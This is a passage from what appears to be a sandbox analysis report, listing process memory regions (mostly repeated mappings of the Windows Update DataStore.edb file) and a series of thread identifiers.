"c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3395 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3396 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3397 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3398 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3399 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 3400 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 3401 start_va = 0x11b0000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 3402 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3403 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3404 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3405 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3406 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3407 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3408 start_va = 0x1240000 end_va = 0x1247fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3409 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3410 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3411 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3412 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3413 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3414 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3415 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3416 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3417 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3418 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3419 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3420 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3421 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3422 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3423 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3424 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3425 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3426 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3427 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3428 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3429 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3430 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3431 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3432 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3433 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3434 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3435 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3436 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3437 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3438 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3439 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3440 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3441 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3442 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3443 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3444 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3445 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3446 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3447 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3448 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3449 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3450 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3451 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3452 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3453 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3454 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3455 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3456 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 3457 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3458 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3459 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3460 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3461 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3462 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3463 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3464 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3465 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3466 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3467 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3468 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3469 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3470 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3471 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3472 start_va = 0xfe0000 end_va = 0xfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3473 start_va = 0xff0000 end_va = 0xffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Thread: id = 131 os_tid = 0x7c8 Thread: id = 132 os_tid = 0x7c4 Thread: id = 133 os_tid = 0x7b8 Thread: id = 134 os_tid = 0x7b4 Thread: id = 135 os_tid = 0x7b0 Thread: id = 136 os_tid = 0x7ac Thread: id = 137 os_tid = 0x7a4 Thread: id = 138 os_tid = 0x7a0 Thread: id = 139 os_tid = 0x6c8 Thread: id = 140 os_tid = 0x6c4 Thread: id = 141 os_tid = 0x6c0 Thread: id = 142 os_tid = 0x6bc Thread: id = 143 os_tid = 0x6b8 Thread: id = 144 os_tid = 0x6b0 Thread: id = 145 os_tid = 0x6ac Thread: id = 146 os_tid = 0x6a8 Thread: id = 147 os_tid = 0x69c Thread: id = 148 os_tid = 0x698 Thread: id = 149 os_tid = 0x694 Thread: id = 150 os_tid = 0x690 Thread: id = 151 os_tid = 0x68c Thread: id = 152 os_tid = 0x688 Thread: id = 153 os_tid = 0x684 Thread: id = 154 os_tid = 0x668 Thread: id = 155 os_tid = 0x664 Thread: id = 156 os_tid = 0x660 Thread: id = 157 os_tid = 0x65c Thread: id = 158 os_tid = 0x5d4 Thread: id = 159 os_tid = 0x5a0 Thread: id = 160 os_tid = 0x468 Thread: id = 161 os_tid = 0x44c Thread: id = 162 os_tid = 0x430 Thread: id = 163 os_tid = 0x444 Thread: id = 164 os_tid = 0x440 Thread: id = 165 os_tid = 0x418 Thread: id = 166 os_tid = 0x414 Thread: id = 167 os_tid = 0x208 Thread: id = 168 os_tid = 0x410 Thread: id = 169 os_tid = 0x1bc Thread: id = 170 os_tid = 0x10c Thread: id = 171 os_tid = 0x3e0 Thread: id = 172 os_tid = 0x3c0 Thread: id = 173 os_tid = 0x3bc Thread: id = 174 os_tid = 0x35c Thread: id = 175 os_tid = 0x358 Thread: id = 176 os_tid = 0x354 Thread: id = 177 os_tid = 0x350 Thread: id = 178 os_tid = 0x338 Thread: id = 179 os_tid = 0x334 Thread: id = 183 os_tid = 0x348 Thread: id = 184 os_tid = 0x76c Thread: id = 185 os_tid = 0x3b0 Thread: id = 186 os_tid = 0x310 Thread: id = 187 os_tid = 0x314 Thread: id = 188 os_tid = 0x390 Thread: id = 189 os_tid = 0x3ac Thread: id = 190 os_tid = 0x2fc Thread: id = 191 os_tid = 0x2f8 Thread: id = 192 os_tid = 0x720 Thread: id = 193 os_tid = 0x798 Thread: id = 194 os_tid = 0x6fc Thread: id = 195 os_tid = 0x5a8 Thread: id = 196 os_tid = 0x78c Thread: id = 197 os_tid = 0x64 Thread: id = 198 os_tid = 0x6e0 Thread: id = 199 os_tid = 0x16c Thread: id = 200 os_tid = 0x1fc Thread: id = 201 os_tid = 0x1f4 Thread: id = 202 os_tid = 0x240 Thread: id = 203 os_tid = 0x234 Thread: id = 204 os_tid = 0x238 Thread: id = 205 os_tid = 0x104 Thread: id = 206 os_tid = 0x300